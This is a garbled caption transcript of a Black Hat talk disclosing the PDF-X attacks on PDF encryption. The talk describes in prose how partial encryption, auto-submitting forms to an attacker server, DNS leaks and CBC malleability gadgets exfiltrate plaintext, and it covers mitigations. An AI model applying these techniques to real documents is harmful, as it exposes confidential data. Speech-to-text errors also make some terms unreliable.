How to Break PDF Encryption

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
okay hello everyone welcome to the talk on how to pay break PDF encryption add like at Europe my name is James moon I'm a PhD student at the Jeff network and data security at the University of Bonn in Germany and this guy here is Fabian easing from the University of blight Sciences in Muenster in Germany and today we'll give you an introduction to our current research on security flaws in the PDF encryption standard which is a joint work with our researchers we call this PDF exfiltration short for PDF X so what is pdf/x some of you may have heard about it it's yet another of those attacks that come with a logo and PDF X also introduces two novel attacks on PDF encryption which we were going to be talking about today both of them are actually weaknesses security flaws in the PDF encryption standard and post them we found by carefully simply reading this standard so one is based on security flaws in the PDF data structure format which is asked for partial encryption we call this attack DirectX filtration and the other one is based on actual crypto on floors in the used cyber modes of operation we call this attack mul ability gadgets so here's know a few of today's talk first I'm going to give you a short introduction to PDF and who actually uses PDF encryption then I'm going to introduce our attacker model and show our first attacks on how to directly extra grade the plaintext off encrypted documents without even touching the crypto and because I don't know much about crypto to be honest from here on fabien will take over and show our cryptographic attacks CBC mobility gadgets and how to practically apply them to PDF documents and also an emulation of 27 popular PDF viewers and some medications on how to counter these attacks ok let's start with some some facts on PDF PDF PDF who of you has never ever heard of PDF when it's good nobody ok so we're on the same side here we're all familiar with the Portable Document format it's basically de facto standard for electronic document exchange these days so standard force or PDF was originally invented by Adobe released in the early 90s and it later on became an ISO standard with PDF 200 released like two years ago by the ISIL um so according to Adobe 250 billion of PDF documents have been opened in their product last year so that's a lot that's where all our telemetry data goes to obviously and PDF is rather popular used by almost every company and institution and out there so to measure the actual popularity of PDF let's have a quick look at Google's statistics fully search term PDF so as we can see here the trend is constantly increasing but maybe the the number of Internet users has been increasing ok so to really measure the popularity of PDF let's let's compare this to another keyword let's compare PDF to the Queen and what you can see here is that PDF is currently almost as popular as the Queen and those are statistics for the UK only so okay I hope I could convince you that PDF is rather popular file format right okay so PDF also supports AES document encryption using either password based or certificate based crypto and a SAS is considered pretty secure right I mean come on and say yes if someone is able to break IES the sky is falling anyway so maybe we should give up here we didn't want to give up yet umm so we sought well let's have a closer look um how encryption is actually applied in the in the PDF standard maybe they did something wrong maybe they did something incorrectly and yeah let's first however look on who actually uses PDF encryption so for example a local bank in Germany uses PDF encryption they know that all the customs they cannot handle PGP and that's mime so what they do is they send all sensitive information as an encrypted PDF attachment with in an otherwise unencrypted email and they sent the password over a second channel via SMS for example why not and then there's some companies that even allow you to do this directly within limit lines so they sell for example plug-ins for Outlook and you can use PDF encryption as a substitution for PGP or otherwise email encryption I've done a lot of modern scanners and I'm PLR you to directly encrypt scanned documents especially if you use features like scan to email this can be quite interesting or this can make sense okay last but not least PDF encryption is used by companies and governments worldwide so for example this is the US Department of Justice which uses which claims to use a PDF encryption so we thought okay that maybe that's worse having a deeper look at PDF encryption but let's first have a look at you're talking attack mode so we're both academia guys so we need a formal attacker model or maybe not so formal in this case um so assume Alice wants to send a PDF document to Bob and this is going to encrypt the document because the communication channel cannot be trusted let it be your email or whatever or maybe let's assume there's some kind of shared maybe cloud storage service and Alice uploaded a document here an encrypted PDF document and Bob downloads it later and it's storage may also be accessible by a third party liked by other users for example so in such cases we can of you do not rely on TLS we need actual end-to-end encryption and using PDF encryption is some logical candidate for this task for this workflow right okay now what is our attacker allowed to do our attacker is an active man in the middle attack er who can perform targeted modifications of encrypted PDF documents either in transit or addressed you can also change the document structure using those modifications or manipulate the actual cipher text by flipping some bits and so on before relaying that modified version of document to Bob to the intended receiver so the document is still encrypted but some changes have been made we'll see that later and we assume that really strong password is used for this document so we cannot do any offline cracking or things like that it will not work okay now pop is going to enter this super secret password or use some certificate for decryption and then whatever reasons the plain text is leaked to the attackers server for reasons you'll see later okay so it is important to note of course that this is not an offline attack obviously this is an active man in the middle but the only reason to use end to end encryption is that you may assume that there may be some malicious party in the middle okay this is exactly the attacker model that end-to-end encryption should protect you from okay now how does PDF encryption technically art work or let me first give you some basics of PDF which result in the tired expiration class of attacks okay so let's first have a look at a simplified PDF document structure a PDF document usually consists of four parts which is a header it's just a one-liner containing the PDF version that is used in a document like 1.7 or 2.0 or so on then we have a body section which contains the actual content of the meant to be displayed on any definition of all the pages so this is the important section which contains all the objects that are actually later on displayed if you open a file and there's usually a cross reference section which contains some indexing table defining the offsets of the objects and things like that and there's the trailer section which contains some more information like a reference to the root element of the document so as a side note PDF documents are usually processed from the bottom to the top okay now let's encrypt this very document and spot the differences okay that's interesting as you can see not the whole structure is actually unencrypted all that happened is that an encrypted object was added to the art trailer section which contains information like which encryption scheme is to be used like AES 256 or whatever and the only objects containing the actual encrypted content are the objects that are later on on display later on displayed if you open the documents like content streams for example why is this why is the structure unencrypted so let's have a look at the standard so the PDF standard says that all strings and streams in a document are to be encrypted but not other object types such as integers of boolean values the idea is that strings and streams are wanted hold the sensitive information okay so the reason for this is plain to be efficient so random access to all objects in the document is to be granted even for encrypted objects so fair enough what does that mean in practice basically the whole structure of PDF documents is unencrypted all these strings and streams in the document are encrypted so in other words a passive attacker who obtains an encrypted occupant can already real a lot of information from the document that may be interesting like for example the number of pages their size the number of objects in the document if there's any hyperlinks and so on and so forth that may be interesting already but it's not the actual really relevant displayed content but maybe there's more so let's once again have a deeper look at the standard so in 2003 PDF introduced the possibility to use trip theatres crib filters provide a finer chronology control of encrypted of encryption within a PDF file what does that mean in practice it means that not all content streams in a document have to be encrypted okay you can nowadays created a document of which some content is encrypted and other content is not encrypted you can do that there may be legitimate use cases for this but it also means that every standard compliant a PDF application must support partial encryption which is very often bad if file formats allow things like that so in other words an active attacker on the network for example can modify a document and can add his own content to an otherwise encrypted document very easily and there's not only a crypt filters so by carefully studying the specification we found 18 different methods to actually do this so it's fair to say that it's hard to implement a PDF viewer that does not support partial encryption that does not support mixing unencrypted content with encrypted content okay so this allows us to do simple overlay attacks like for example what you can see here is that we open an encrypted document for example with with Adobe or any other PDF viewer we our o we insert our password and we can see some encrypted um text now let's open this document with the text detail we can see there some garbage that's encrypted part and we can see a es is used to encrypt the document now we can insert our own object number six we use a crypt fill to heal without any arguments which means that the content is actually not encrypted now let's add this object number six to the contents of that PDF document and save the document let's reopen it with Adobe or other readers inside our password again and you can see here is that a string is edit reading stop like at Europe 2019 okay so this is relatively easy for an attacker to do to add new content to otherwise encrypted documents human I'll say well fair enough the standard claims protection for confidentiality but not for integrity and we just broke the integrity here right so the questions can be do more can we do some targeted modifications to the document using this technique to maybe to somehow exfiltrate the plain text by modifying the document structure maybe we can do that let's have a look at the standard again so if you search the specification for a documents possibilities to communicate with the outside world you will quickly spot our various actions in the PDF specification such as disabled sup inform action so similar to HTML PDF can also contain forms so you can insert some values and then maybe save the document printed and silent but you can also submit it by clicking on a button in the document and this is quite interesting because the values of form fields they can be any reference to any string and stream in the document as the Senate s so what wait wait this is exactly those two content types that are the only content types that are actually encrypted the only content types that are actually unknown to an attacker okay and that can be submitted using a form okay so we thought maybe we can define some specially crafted document where we add some button and then using social engineering maybe we trick to use into clicking that button there by licking the plain text maybe yeah but then we thought that clicking buttons is lame we are not going to get to blackhead if we let users click buttons so we consulted the standard again and then we've swatted some various options to trigger some actions to trigger some events basically that allow you to submit a form for example based on once you open the document from too close to document once you print the document and so on so the easiest example is like no connection added to the document and the idea is to I want to document it's opened the open action triggers to submit form action which then leaks the plain text okay let's put this all together what you can see here is minimalistic our encrypted document with one single content stream and we added a field which refers its value to object number two which is the encrypted content stream and then we add an open action to submit form automatically once the document is opened to http PDF which is the attackers webserver and the idea is that once the document is opened the content is automatically exit rated so this is not a theoretical issue let's try this in Adobe so once again we will modify our encrypted document using a simple text editor and we will add an identity a filter for all strings in the document so all streams in the document they will remain encrypted but all strings are not encrypted anymore this allows us to easily add things like a URL with an open action so in this case evil dot X epsilon is to server to submit the form fields to and the value of the form fields is the object number for you object number for you the encrypted data okay that's a safe this modified document send it to Bob again to our victim maybe we run some netcat or whatever some server to get incoming traffic on evil dot X Epsilon let's open that document in Adobe and insert our password and what happens is that current versions of a table they will show us some dialog do you want to submit data to evil dot accepts long the default is to to allow this once you allow it so once you have the possibility to click something to evil evil evil dot X epsilon it will always allow that a lot of readers will not ask you current versions of Adobe will ask you before leaking the encrypted text however the dns request is made by Adobe before you click on yes or no so they are sending the dns request before you even have a chance to click deaf eye you can leak within the subdomain of the evil dot acceptance server for example up to 250 bytes of plain text without any user interaction all you need is an attacker controlled a DNS server for your own domain or web collaborate or whatever which is pretty easy together ok there's some other options to leak plain text um you can also include your links in documents so you can have clickable links like in HTML but you can again also open links automatically once the document is opened you can also make links being triggered if the user click somewhere into the document and things like that and what we can do is we can submit two HTML PDF also allows you to define a base so in this case we define a base which is our attacker server PDF and all relative URLs in the document will open with the PDF domain prepended so once this document is open web browsers opened and the plaintext is exfiltrated with the was in the past of the PDF ul this is a bit less silent and deforms issue you have seen before because it will open a web browser but still it's pretty interesting and a lot of PDF viewers are work for hyperlinks but will not submit forms okay and last but not least there's also JavaScript in some PDF viewers which allows you to do the print the same to access the plant the plain text content and also leak it if the if scripting is actually supported okay so much 40 super easy attacks they can I call them easy because they can easily be crafted and they can also easily be detected by having a closer look at the document structure right so we saw it can be do more can we somehow modify the documents plain text by performing targeted modification on the ciphertext level itself and because I suck at crypto from here on Fabien came around had a closer look at the crypto and applied all his crypto magic tricks to PDF yeah thank you yes and let's talk about encryption and PF so let's talk a bit more in a broader sense about the history of encryption in PS so the first version of the standard didn't have any encryption defined but after that Adobe decided to add rc4 encryption with a 40 bit key so that were expert cipher times so that was fine for them then they decided to add 1 and 28 bit keys and all of this is deprecated by now up until version 1.6 and 1.7 and that's around the point when it became an ISO standard as well so then they added is CBC was a 128-bit key this is the real news and well they updated that newer versions to use 256-bit keys and what's important here is that the key derivation function changed multiple times so it was broken a lot of times and it was a weird key derivation function and nobody could say anything about that but in the last version they changed it to be a document level white key derivation function so before every object has it had its own key for encryption and decryption but now in the newest version it's a document level white encryption so the key is the same for all of the objects for every ciphertext they use the same key this will be relevant later so whether its encryption there must be some form of integrity protection right you want to build a secure data format so you should have some way to prevent an attacker from modifying your document well in PF there is none so no mac no authenticated encryption so no is GCM it's simply is CBC without any integrity protection that's what got up thinking haven't we seen this somewhere before so some of you might remember our text from last year the e-file text or CBC gadget attacks and encrypted emails in so an S moment open PGP and basically the attacks we applied here are pretty similar but if you don't remember no worries Argus like if you brush up on that so these malleability gated text mainly required three ingredients one we need ciphertext malleability and more than not a mac so we need more meaning ability or come to that and to perform male ability attacks we almost always need some part of known plaintext so we need to know some part of the plaintext to be able to modify the cypher text accordingly and finally of course if we want to leave trained to expect to an attacker we again need next filtration channel well courtesy of yen's we already have that done so we can simply reuse forms and hyperlinks to exfiltrate the content to the attacker so let's look at ciphertext malleability and some of you might remember this graphic from crypto 101 or whatever crypto elektra you maybe had somewhere so this is the decryption function of is CBC so it's the cypher text up here the plaintext down here and it simply works by taking a block of ciphertext decrypting it eggs are in the previous block of ciphertext on Tibet to get the plaintext so what happens if you decide to change the sing of bits in the ciphertext like in the initialization vector in the IV up here well if you do that that very same bit changes in the plaintext that's due to this X operation so you can flip bits in the plaintext but you can do more so if you happen to have some known plaintext for example then you know the first block p0 down here then you can simply XOR p0 onto the IV and get what we call a gadget so it's all zeros down here and this is basically a blank sheet of paper and you can pull that any wind ciphertext and have a blank sheet of paper so what can you do with the gadget well you can exert chosen ciphertext onto that so simply take your URL H CPH TDP P dot the F and X are bad under the ID and you get the URL in the decrypted plaintext so that works quite nice at the beginning of the document but as I said you can copy a gadget and use different plaintext somewhere else what happens if you do that is this so we move the gadget to the right of the ciphertext and we get you to the other launched effect of CBC some random bytes so we don't know the decryption value of this so we don't know what the result here is but we still get our actual URL down here so we have to deal with a random somehow I'll show you how we do that so that ciphertext malleability done let's move on to known plaintext as I said we need to know some part of known plaintext to build a gadget so we decided to have a look at the standard again so maybe there's something under standard that helps us with that so we came to look at the permission management of PS so in one of the first versions of PDF Adobe decided that maybe only the author should be able to edit the document after creating it or users shouldn't be able to print it so they added a value P where they put a bit mask where every bit corresponds to the Machine so of course people started tampering with that because it was basically left in plain text in the document and who wouldn't simply change a single number if they know that's how to break the permission management so the eyes of working group decided in PDF 1.7 data should of course encrypt that as well so any compliant reader has to compare this value to the encrypted value so the original value was left in place and a viewer has to compare that to that to the encrypted value to be sure that nobody changed that okay so how does it look they used is 256 bit for this and therefore they need a block of plaintext so at first they decided to add some ones for extension so they decided to simply add some bits for extension for by just once okay next they put the permission value so that has to be somewhere in there to be efficient so that's the next four bytes so that's a bit mask of permissions next they put a character T or F for true or false in there to show if the metadata of the document is encrypted and finally they put an acronym in there a DB for Adobe probably and finally to fill up sixteen by sixteen bytes there are some random so that's unknown to us but well we know the first 12 bytes of that so that's known plaintext by design and that is quite nice so let me show you how that looks in an actual document so we have this fight complex and cryptic nary you can see down here the p-value I've mentioned so that's the unencrypted a bit mask of permission and the post value is the extended value so that what I've shown you in the last and this encrypted with is so remember what I've told you before about the key derivation in PDF 1.7 X and Larry Page decided to use a document white key and that means that every cipher text in this document is encrypted under the very same key so any plain text from the perms value can be reused in any other cipher text so to sum that up fine for you though we decided to add permission management to the PDF format that I sustained at your group decided to encrypt that to prevent tampering and now there's no plain text available to attackers and that's better so that's all ingredients done so let's look at what we can do with that remember we only have 12 bytes of known plaintext so that's the difference to a complete gadget but we have found that this is enough to change the display text so do an overlay attack again we simply use a gadget to insert text and for the comment sign after that and the random bytes of 4 bytes of unknown plaintext from the perms and 16 bytes from the Avalanche effect I've shown you and comment that out so how would this look in a document well basically like this so here I created a completely new object inside that so overlay tags can be done with caches again let's talk about really exfiltrating plain text so that's why we are here for so let's look at forms again you have seen a form before like a few slides back at the ends and again the font field is - also the actual encrypted data and the URL is now a gadget so we simply put a short URL PDF so HTTP PDF that's around 12 bytes so just so you know we put that in there and we can use that to extract write data again and we'll see how this is automatically done in Chrome in the next demo so okay the user opens the original document and put in the password okay Tex will beeping awesome no problem so we see the secret text hello black hat and we want to leak that so I've prepared a script that will perform the gadget detects for you so what it will do is we get the gnome plain text from the pants value it will generate a blanket from that it will be generating the URL get a value as a string value to make it look nicer and then we set that to a document open the HTTP server open the modified document the user inputs the password again and there's the plain text and it's not only the plain text but it's actually the whole stream so we see everything that's inside this object we need so that's pretty nice and that was automatic that was fixed in your versions of promo codes okay let's look at hyperlinks so we can just change this play text we can define you from URL but we can also prepare your else to existing cipher text so now we manipulate the existing object so existing cipher text well we can do that by simply appending a catcher a prepending a gadget to the original cipher text and we get a URL of course they are 20 bytes of random in that and that might break your link Otis in practice it does quite often so let me talk about issues with that so our gadgets are short that means all your elves are short short bad words well you might be hard-pressed to get the domain PDF in real life and they're random bytes in the URL so that might break your land cover so this is all but flaky it's not as stable as it should be and well I've mentioned before but of course if you use CBC we use because they are seven petting and if you don't know the last bites that's bad because we can fix the petting and so on and so on another problem was that most plain text in PDF documents is actually compressed so those are hard are exotel complex compressed plain text a holiday exfiltrate because if you simply ignore the compression and depend of your l prepend au l rather that will again break the URL encoded because to the URL encoded that's basically random bites again and pre and appending text to compressed plain text is more complicated so we could have stopped but we were well maybe compression can do something for us so the compression use is the so-called deflate compression and deflate has two nice properties for us one is the data stream the compressed data stream is separated in so-called segments or blocks and segments can be uncompressed or compressed so you can mark segments as uncompressed and write simple texts in that and then say this segment is over start with the next one and the second one is the actual compression is performed by using so-called BEC references so I can refer back to a segment where Rob comes in and use that again in ciphertext or in the plain text rather so let's build this from the ground up with gadgets so this is the original already decompressed contents so of course in the cypher text it will be compressed but you can read it otherwise and let's add some gadget in front of that so let's start with adding the deflate header so deflate has some higher values that should be in front of that to let you know we the view I know that this is the compressed of course there are random bytes so let's ignore that for now on start the next gadget this is our URL again random bytes should be bad but the next gadget is actually the first one that will be interpreted by the reader because we said hey the object starts at byte offset 65 and you have to believe me about the next one and well we put a back reference in there and suddenly we have a perfect ul so we say to the deferred algorithm remember this URL we wrote back here just use that here and it's coming together perfectly so how did this attacks work in practice so how about viewers let's talk about evaluation so we test the 27 PDF viewers 27 more less popular PF viewers and found all of them vulnerable to at least one of our text so we differentiated between the text with no user interaction so like the one you saw in chrome when I open the document and the plain text is already leaked and those with user interaction that might either be clicking somewhere in the document so if we overlaid the whole page with a link for example or it might also be the dialog queues you have seen in Adobe but as you can see a lot of viewers are actually vulnerable to attacks without any user interaction so let's look at some more popular views let's look at Adobe and Foxit you've seen Toby before and yes I've already told you via some DNS magic we can already extra try 250 bytes of plain text without any user interaction for Foxit and Adobe malleability gadgets so they are implemented a bit differently that's why the results are differently for both attacks so most readers are not perfectly standard-compliant and so on so different text for different years but still we have for Fox ed and Adobe at least attacks with user interaction we could also break both wheels be tested on Mac OS with user interaction again and as you have seen in chrome and also opera because they use the same engine we had acceleration without any user interaction firstness all readers are not so nice actually because our readers are vulnerable so let's talk about fixing this so you might think signatures might work right signatures are some kind of integrity but actually some cryptographic signatures of course and that should prevent the attack right not so much for one signatures do not prevent opening a document so a broken signature does not prevent you from opening the document because well it's not mandatory that there's a signature and that it's valid so your plain text might still be leaked even before you see the document so that's bad you will get a warning but then it's delayed and signatures can be stripped so they are not encrypted they are not mandatory so the attacker can simply strip the signature from the document or even at their own signature so again they won't help you and some members of our team this year presented the text on signatures and showed that in most viewers signatures can be easily forged so again that's bad so closing back channels must have right so yes if we have no way to get trained to expect to the attacker there's no way to leak plain text okay but that is rather hard to do the PDF standard is 800 pages long by now and these nearly scratched the surface with forms and hyperlinks and maybe Java Script so should we really move that so there might be more and should we really move all of them so don't you want farms to encrypt the PS don't you want links so links might be the worst so who doesn't want links in their PDF documents and should we really move Java okay maybe we should but the thing the single thing we could do as implementers of PDF us is to ask the user before connecting to a server so shall Santa a lot like Adobe does to inform the user there's some connection to web server but not all of them do so what were the reactions so what were some shorter mitigations well pepper decided to do exactly that at a dialog telling you the whole URL and this is the encrypted plain text so that should be easy to recognize and you will probably not click that link any most of it Google on the other hand well they fixed the out of how to submit form back but after that they simply decided to stop trying to fix the unfixable and we think they are pretty right in that because the ones who have to fix that you see ISO standards group so these attacks shouldn't be possible in the first place so let's look at some real mitigations well mitigations against repping attacks to deprecate powershell encryption so very little documents actually have need for unencrypted paths in encrypted documents some very little documents would be affected by that assembly remove that and well as the short term fix disallow access from unencrypted to encrypt the documents their objects so if a form that has an iron encrypt that URL cannot access an encrypted value then there's no problem for now and against CBC gated well it's easy as well use authenticated encryption Soyuz is GCM or if you really must use CVC with a Mac at least but then be careful of downgrade attacks and change the key derivation function to be able to detect any downgrade attacks okay so what did the dhobi say about that Adobe three action was where they said this has been escalated to the heights of working group on crypto and signal trusts and will be taken up in the next revision of the PDF spec so I guess that's a win so all in all PDF documents allow for partial encryption which leads to diode exfiltration attacks which leads to little plain text PDF uses legacy crypto like unauthenticated CBC which leads to gather the text which again leads to direct leads to acceleration of plain text and therefore PDF as a data format that can accelerate itself like encrypted email as shown lastly so you can reach us at this email address if you have any questions and on this website you will find all the attacks or the details the papers on both PF X and the attacks on signatures and yes you can also find all exploit PDF so if you didn't help me to see your read on the slide you can test yourself and yeah that's it thank you and any questions I am yet will this method will your method work to reveal redacted information in a PDF document that's been where the owner of that PDF document has redacted the information using a recent version of Adobe what is the question if you can do that in recent version of adobe's uncover redacted text it says the question yeah so if you have this is about encryption so it's a bit off-topic but we will let it exactly this last week and no so the reaction functions of all modern PDF use are actually pretty good pretty well implemented these days if you use the actual text redaction function they will actually work on the underlying object that have been immature in text and actually redacted in Adobe actually if you delete the text or object under some circumstances it will still be in the document mmm I said it's got nothing to do with encryption but it's quite interesting if you export from other applications like from word and so on the redaction function may not be that good as we see in the news all the time when you can unruhe text in documents okay all right thank you [Applause]
Info
Channel: Black Hat
Views: 17,538
Rating: undefined out of 5
Keywords:
Id: phLOQ0pROag
Channel Id: undefined
Length: 44min 16sec (2656 seconds)
Published: Wed Mar 18 2020
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.